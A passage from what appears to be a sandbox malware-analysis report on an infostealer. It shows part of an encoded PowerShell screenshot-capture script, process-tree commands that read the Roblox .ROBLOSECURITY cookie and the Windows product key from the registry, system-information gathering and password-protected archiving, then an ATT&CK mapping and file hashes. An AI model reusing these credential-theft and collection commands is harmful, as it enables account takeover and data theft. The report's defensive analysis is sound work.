GUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4000
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\w0ge2tyh\w0ge2tyh.cmdline"
        5⤵
        
        PID:4888
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC767.tmp" "c:\Users\Admin\AppData\Local\Temp\w0ge2tyh\CSC4618AC5A4780498CA62CE4DDC7F41FED.TMP"
        6⤵
        
        PID:2456
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1468
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:3920
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4748
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:4940
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2856
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:5020
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "tree /A /F"
    3⤵
    PID:672
  - - C:\Windows\system32\tree.com
      tree /A /F
      4⤵
      PID:1496
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:2316
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4740
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
    3⤵
    PID:1052
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4688
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "getmac"
    3⤵
    PID:3752
  - - C:\Windows\system32\getmac.exe
      getmac
      4⤵
      PID:3148
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\oTw6b.zip" *"
    3⤵
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe
      C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe a -r -hp"1234" "C:\Users\Admin\AppData\Local\Temp\oTw6b.zip" *
      4⤵
      Executes dropped EXE
      PID:552
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic os get Caption"
    3⤵
    PID:2112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic os get Caption
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3880
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
    3⤵
    PID:1984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic computersystem get totalphysicalmemory
      4⤵
      PID:3048
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
    3⤵
    PID:1288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic csproduct get uuid
      4⤵
      PID:3336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
    3⤵
    PID:2900
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      PID:1072
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
    3⤵
    PID:4008
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic path win32_VideoController get name
      4⤵
      Detects videocard installed
      PID:4640
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
    3⤵
    PID:872
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
      4⤵
      Suspicious behavior: EnumeratesProcesses
      PID:3656

C:\Windows\System32\WaaSMedicAgent.exe
C:\Windows\System32\WaaSMedicAgent.exe 3f499f1a5bb84dd59b7f88349188026a d12We2lwwUuCpankJFHoOw.0.1.0.0.0
1⤵
PID:672

C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
1⤵
PID:2436

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Privilege Escalation

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Process Discovery

T1057

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
454c5c4b128d34aee2eb765f2a9c0aa9

SHA1
4b6e92db79d964f604fd6b261b3b19ede2aea8a5

SHA256
e1e65d1697b9ac59805f677cbc8eec623a899b75b1389354f0948ad3c1513772

SHA512
17b4e146ef4f8862d06ac975204cca9ef9b077420256df92d94409715b18efb4dc63879154c1c234317a169ac63024ed43b5cb52473882dc46c588af089f25d6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
8f6c280dd50f43ba753a6199446a4e32

SHA1
0a23d883d0148af5390b2f9bbf67beb84a6bf551

SHA256
5a2fc253dcd892f06a25b8a9795bc82c8dfefb9d68425e1aae8d5edde7c4b1ee

SHA512
0e2ccad087adcd517d698213a83d4f6467c496057df1eace2c0997984346f5cbe368fa25d1ccd1b45d0f60f6a3a2c2f4fbe1be61635311be07952c7af102e2e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b736b1cf455023520eb7abb7f35ddaa2

SHA1
f3d04d1c5d14eb92c1e466ee4767ea65680b4070

SHA256
3530522d67a50208cbc38ada3fc1ce9c3f858488e1573e2cf1da6748040b8849

SHA512
5bff0ecabba8d72a06456a54911e623e519b4ed78d21e32de94cfae5e21636f46e5134c95abd184b43fec7fd2fd0a12087a330eb3cd41cb5507db4a1996c5158

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESC767.tmp

Filesize
1KB

MD5
949e2ad168e896dd2bcf86b583e1b298

SHA1
627cec647c1b12d0eb1b239c92c1514e8dc78b6a

SHA256
2aa67565b0411a53f3db85801884764e4ff4317c6e4b930b167875ac65c50757

SHA512
70ff746c8ecc0d816c8e81b27accc3253378061672acba41ebf86ef69fdb07e7dccb5120750ed777ac49293849cfe87adfaeeb305a869381ddd351266eda8ece

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\VCRUNTIME140.dll

Filesize
117KB

MD5
862f820c3251e4ca6fc0ac00e4092239

SHA1
ef96d84b253041b090c243594f90938e9a487a9a

SHA256
36585912e5eaf83ba9fea0631534f690ccdc2d7ba91537166fe53e56c221e153

SHA512
2f8a0f11bccc3a8cb99637deeda0158240df0885a230f38bb7f21257c659f05646c6b61e993f87e0877f6ba06b347ddd1fc45d5c44bc4e309ef75ed882b82e4e

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_bz2.pyd

Filesize
50KB

MD5
698c1303e7ba75129b7031a427ea4587

SHA1
850317d1b3977ffc4e4577b5cf810786b70db768

SHA256
631986727d23bff71bb824a06ce21d4485dc4a82a283a99fbf457483be59c3f7

SHA512
da33b3304d487b269fe3e22c6b6f437b937fad4f6a25ad0ff12d49842e15c564af6d1f343523998bbf7ba6ec3a72ef5083ff256a8050212b87ad43b3c0742c7b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_ctypes.pyd

Filesize
61KB

MD5
ab71cf8d96142ed8b2ae8c4caea20f20

SHA1
0ad1dc04a895f45e71a5a5dc9b4a9487d4e9e4c7

SHA256
5980fa126c22d76ebfb5ac3186445121c994325b85d31d3f4b7cfc76fc0dc616

SHA512
683b2a328463714acf259d252714deebb7c7b0ec46a6b2a3f20781001f9e96f787218d24bce05e8207974b4de2393da6fe3ef0fb9168f91b83b241dc07840895

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_decimal.pyd

Filesize
109KB

MD5
53c439f442b08955ba160f89f384b295

SHA1
7d27b16efd2e0114061c544f07bcecd94bcf9651

SHA256
c66db0368b98bc2332c5cc8dd9aa7bb8150a4c1162c064a873f007182488f968

SHA512
b19e5eba558f90676186dca7b6e2e5f6c83afee466c00bdfc8141c3ed61b56c768c42a28b3febca588ed5eec2a73a0c4d2e6bfa263b7a9d7c5b85212cac0dfbb

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_hashlib.pyd

Filesize
36KB

MD5
f589f4dedfb54a8a424c7d67a870f343

SHA1
b0269e30456b499157d021576fc84ba390e7a95f

SHA256
361c9596f2788f35dd6e9614fa0dfdb0565c719ae9a85073110eb3b970923339

SHA512
5e168c9e074ac6603a0b8612f910e76c7485331749163f7c7e0c990059261ae347a4d09176115361acb6f45640f66cae98925a0af21eba9f208f4a2d71d718b1

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_lzma.pyd

Filesize
88KB

MD5
ff9d95babaf25f2b585a53c09d80be75

SHA1
e911e1ec5957e3c9d112a845e70e02dea8cdb7d1

SHA256
d0b282abc78f98ae33e756c44d9981cffd246d318ae325cdcc135b70d11d82fc

SHA512
14cc5964a0674af705bc347b287ad2a26165bb971e9a99652870db51b0042f564605fe559f5af276dc02a55a0b93a57f5f634e91a91e4b2da91cb81b9aefa1b2

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_queue.pyd

Filesize
27KB

MD5
029579b124b4abb292a79f63d4c6c04e

SHA1
75a19f6cd8f0645a7161efb5db9471ae1c7d72db

SHA256
3c221f4b456833ecd6f11e77ae9b05da5a38ce0114a5c24071002b1ad502c266

SHA512
72bc000e9d7ef2c366f04b1b38266c884a8c08a101f468b49617ebaad1009a522ba7b4fa0eae186eedc12e1962db3c5637b1f7efac04ad4c2f4629e1f12d363b

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_socket.pyd

Filesize
46KB

MD5
dc054de6ea9a3b995af65df9f65e0456

SHA1
326ede4b154185518e9cbf816bf05ff6bc82bac6

SHA256
21768a2e7d7197dea93e84dd3ae1a9e2a411bbc966a8743b03bb50016790db99

SHA512
8412125a609a216ca94fff7e142d4bc1362c1da9989259dfa7262393b737f25a668d5fb749e424c1f91509194879e4c73b97ead5765d735176e3203a5a35abf5

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_sqlite3.pyd

Filesize
59KB

MD5
dd5f059bff900cdce9b595ccce7d1151

SHA1
89612aa889a1eb5e508c893b59c40ed944e843b9

SHA256
087d8ffe952beece1b8f443d1ab99930a335af38eacc6810cccf8ad9241b9362

SHA512
1489504cdb20fe54257455d4fce4542a04e0d1df747d71763b8504e87033e23efff77dd58abb58f33888f826ce18e6817fe183a7b959ae241b39767a31d4424c

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\_ssl.pyd

Filesize
66KB

MD5
9d03d71357ec0b041b8152c75177f0ca

SHA1
7c952de84739917085c9d4bcaac433f960b9f959

SHA256
c91d6fa8b91b15b6460b2f6050ee963ad78b959fd19b3ce9fd7c103b64b881f4

SHA512
d947dfcf56dc872a92dfd4679318c4569f20f7fced2878e0c50c28ae56054d97f5abd313b5c580e9618913a61a0b8ee3dac7f637f038dd9e79396feed2229ebe

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\base_library.zip

Filesize
1.3MB

MD5
45c10d5250a59d4cd3f184e0b40307b1

SHA1
5cf672ab1466b62769aa2f26f0551e004dd24ccc

SHA256
a96436adef58c3f054f9407a06dc56f42f5ee2ea80c91ede2d2f6e47dfdf9a7e

SHA512
e2ed7449b6a2eac589f3c99c82a8c428b082702910154214714e87df642f2d313467a1aee451dec8586516ded5a545c85769ecbc3c7fdbeb66320e03c06e4744

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\blank.aes

Filesize
112KB

MD5
4484655d501179ad1f3b59eef091b785

SHA1
5b0bf6615d5e049326b1c642bf714e1f7a23e41a

SHA256
1d4e12f6754cb2b99c0321dfe40d50b66e73a050badafdd37a71b71e8883d0ff

SHA512
3ac0be773e70ba9940bba92271a5f0fe26aae50ee932cac0044afb5adb7b7303ce917a00cc3ae184815100d17983b079165eb7efab95ede96f7c68070b632398

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libcrypto-3.dll

Filesize
1.6MB

MD5
8377fe5949527dd7be7b827cb1ffd324

SHA1
aa483a875cb06a86a371829372980d772fda2bf9

SHA256
88e8aa1c816e9f03a3b589c7028319ef456f72adb86c9ddca346258b6b30402d

SHA512
c59d0cbe8a1c64f2c18b5e2b1f49705d079a2259378a1f95f7a368415a2dc3116e0c3c731e9abfa626d12c02b9e0d72c98c1f91a359f5486133478144fa7f5f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libffi-8.dll

Filesize
29KB

MD5
08b000c3d990bc018fcb91a1e175e06e

SHA1
bd0ce09bb3414d11c91316113c2becfff0862d0d

SHA256
135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece

SHA512
8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\libssl-3.dll

Filesize
221KB

MD5
b2e766f5cf6f9d4dcbe8537bc5bded2f

SHA1
331269521ce1ab76799e69e9ae1c3b565a838574

SHA256
3cc6828e7047c6a7eff517aa434403ea42128c8595bf44126765b38200b87ce4

SHA512
5233c8230497aadb9393c3ee5049e4ab99766a68f82091fe32393ee980887ebd4503bf88847c462c40c3fc786f8d179dac5cb343b980944ade43bc6646f5ad5a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\python312.dll

Filesize
1.7MB

MD5
b4aca05e0313328b0cb6c696b15dc130

SHA1
2aee2e1f3c9135651a61453b0a3480bda49282e0

SHA256
a6a2a464dfbb3bf5dad26a0eeae1af443160e2996ca59b85a9669e94b1a0d136

SHA512
2a2bb820ff9103379c7b273c1dde88e4701232c4793df0641a095a48c0f19d73300df7fd0e2433977667864279e8a8b5da6d0df493c46adf408c291469d81f6a

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\rar.exe

Filesize
615KB

MD5
9c223575ae5b9544bc3d69ac6364f75e

SHA1
8a1cb5ee02c742e937febc57609ac312247ba386

SHA256
90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213

SHA512
57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\rarreg.key

Filesize
456B

MD5
4531984cad7dacf24c086830068c4abe

SHA1
fa7c8c46677af01a83cf652ef30ba39b2aae14c3

SHA256
58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211

SHA512
00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\select.pyd

Filesize
27KB

MD5
748a2840018c697f8c38043b2bc80562

SHA1
2d07e9372fe9fafd6c0ab5e0ae09b04961b147c4

SHA256
7d9e448ef9b89978885c4b16fed76c8e72c5d9b5185bad95770fde84df1134fc

SHA512
5dc5c13b3a54f1ad4ca80cc994ddb072cd3bc093c58533f144d5268458fa589d0d8243c5dd3ec421bbf97a0ea72ce411c090076487b3ca7e329b31c1dd9b6a64

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\sqlite3.dll

Filesize
645KB

MD5
99fbd3751bb02e3807c35bd701e6a764

SHA1
70f329aafa04ec3ba98d97d803dab3e6b6b63756

SHA256
b176131217844666b267813f7dadf18e3aa7c56fe22d5c872e95543fd132a093

SHA512
a345a6809dfee336f3145e0cbebe2b7999f1b771a2490ea85af42b0bf7cb48d7acc3e9431d2981d3205a60f93c7dc8a8d4a88a8bd00884817198da895fbaeb74

Download Submit
C:\Users\Admin\AppData\Local\Temp\_MEI19962\unicodedata.pyd

Filesize
296KB

MD5
011cba6a7c5145d620655b22fec99e89

SHA1
ea7b9b2a0ac6f376eb9c0e6edd4487de34617808

SHA256
8b4b1b829be6705d9cf55680517774459e491a6d5c0561c8a942a350d309abec

SHA512
88b19b4ca4516662050d6cf7ce1be838ecbde9cbac6d1b40bc6baddead5db0c009002cbd6f81b74312615cbc8214a7e9542c1e0f40ba4aafbe78556d30c89128

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rrk3rhpn.d1s.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\w0ge2tyh\w0ge2tyh.dll

Filesize
4KB

MD5
31311980eb20f8df7ac84e2b53c905b3

SHA1
9b07198f4bf4e4d909f7361b4f459a881c4c731e

SHA256
21e69ea10f0714f6f2fc63c4afa2c50a901e960b68282fd5c53b8bdcd3f759f7

SHA512
fc74bcca1c9de9fd8d826ee81cb9986937f39adb20664a9bc7e8ec48f293d4a5dd39767db49fbaac2b7d5808a25fe2382142f3e546ab4082e49bc8fff6092a01

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\CompressGroup.docx

Filesize
14KB

MD5
977bfa55010955dee988da002b01b40f

SHA1
5001bcd50df56d62d1e89cc2c0b943b665d5795c

SHA256
089efa7933daf673b65009d8ce0ac5ca8271bab45aa15093d9606c6fbdda2892

SHA512
7440224b1746be6959ac5e37774a42ff055c88fc01054a7b946d5f10911bf51eaa302f46975c5ab098e5f73b1114ed9b9c355edfeca8107d9a09a8630039cef6

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\MountUnprotect.docx

Filesize
18KB

MD5
a02406dd12311a27327089013e148f25

SHA1
45b4b00bde611c89a070619e144d88fdb173b2a8

SHA256
3f4c899d6f12a704263a161dd62b777f04b2dd8fcc40d3d74c42d96fd984d2e5

SHA512
4697ec8cc44a738d23b29b079892cd17a371473db61657ecc465fdeb0ddb949239d48dddcd807f977d91960aabd88de39d4942c4e560d8df4f756459719c9aef

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\PingFormat.jpg

Filesize
429KB

MD5
0cf12960f3c76758e837427ac002f8b6

SHA1
df051fddd9f130a820a916c25a3602af7ccd7cc1

SHA256
d09dab3c66ca4db51fc6dead77875c42700a40b96831b3b78203c933644c1484

SHA512
45fab3cdf16e3d434f69dd52ec5004325289d422bce220e57bcddb699ee287d7b301a38793b2ec2309f037b3ae5830b709ccb2347f02bd52c2d6ad2f1f521549

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\PingRevoke.xls

Filesize
538KB

MD5
2006fe737c1600d73242a7b8d418a196

SHA1
18e8d59b5a1461615139553ff14a307fcec318ae

SHA256
f683044924bff6c068572855141ada4577535787b6a21b20672a57fb91155cd3

SHA512
0b5ee36ddf275068b69e8fab5cda79ac8fc7adcac0dbbd0029a6252f7fba67eb80566fbb2bfcf0f68cebbd116cc73c11dfd93641e3f40194d19e60553821895c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\RedoConfirm.docx

Filesize
20KB

MD5
9ca075472e08f3f86379d3b9f73f0feb

SHA1
1581838d7a1452486742f923201208370e1c7cda

SHA256
0e4cbc9973dd783974e754be5e92f28d5439f5628177af06e2f27513ffbaa4ef

SHA512
61f165c12cd24ebb1886cfc57af91df0b91d088cbba3bc29e386b030fd01698610231657013af9f8e30e339b5a4d1df7aa58b0236fd5049e7011ff4e51b1560b

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Desktop\UpdateSubmit.csv

Filesize
465KB

MD5
8f21caf8342fa449da61374fb2cee5a9

SHA1
129917586d928392a2bcf595e0618f1b6477afbc

SHA256
b921a577882668145eab65f6bbcd483630e1fa028d184b21294f6d7d30c53484

SHA512
418b34da090cd4dae40957ff786f3cc59ea386649b9dc7ece8559a377fc71efbff021c53a4eedb4cb99d8dd258138ad5b49511fd1cd5bd1540bdac40a209a89c

Download Submit
C:\Users\Admin\AppData\Local\Temp\‏‌ ‎‎   \Common Files\Documents\DenyRevoke.docx

Filesize
20KB

MD5
60f0c704172982dca75c637a92b45f37

SHA1
a718e92da5554ba97111122accfee923e7a231d8

SHA256
